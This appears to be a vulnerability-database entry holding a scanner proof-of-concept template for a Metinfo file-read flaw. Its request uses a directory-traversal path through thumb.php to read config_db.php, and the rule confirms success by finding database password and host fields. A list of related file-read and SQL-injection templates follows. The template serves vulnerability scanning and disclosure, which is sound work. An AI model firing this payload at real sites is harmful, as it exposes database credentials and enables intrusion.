metinfo-file-read: Metinfo file read

漏洞描述

PoC代码[已公开]

id: metinfo-file-read

info:
  name: Metinfo file read
  author: amos1
  severity: high
  verified: true
  description: |-
    Metinfo file read
  tags: metinfo,fileread
  created: 2025/03/27

rules:
  r0:
    request:
      method: GET
      path: /include/thumb.php?dir=http/.....///.....///config/config_db.php
    expression: response.status == 200 && response.body.bcontains(b"con_db_pass") && response.body.bcontains(b"con_db_host") && response.body.bcontains(b"con_db_name")
expression: r0()

相关漏洞推荐

• CVE-2019-16996: Metinfo 7.0.0beta SQL Inject
• CVE-2019-16997: Metinfo sql inject
• CVE-2019-17418: Metinfo sql inject
• cellinxnvt-getfilecontent-cgi-fileread: Cellinx NVT - GetFileContent.cgi - FileRead
• eaa-fileread: EAA 益和应用接入系统任意文件读取
• esafenet-sql-mysql-fileread: 亿赛通未授权文件下载
• huatiandongli-ntkodownload-fileread: 华天动力 ntkoDownload 任意文件读取
• huatiandongli-templateservice-fileread: 华天动力 ntkoDownload 任意文件读取
• huijietong-cloud-fileread: Huijietong Cloud File Read
• mapgis-cloud-manager-local-file-read: MapGis Cloud Manager Local File Read
• qibo-cms-job-file-read: Qibo CMS Job File Read
• sangfor-reporter-anyfileread: Sangfor reporter 任意文件读取
• solr-file-read: Apache Solr <= 8.8.1 Arbitrary File Read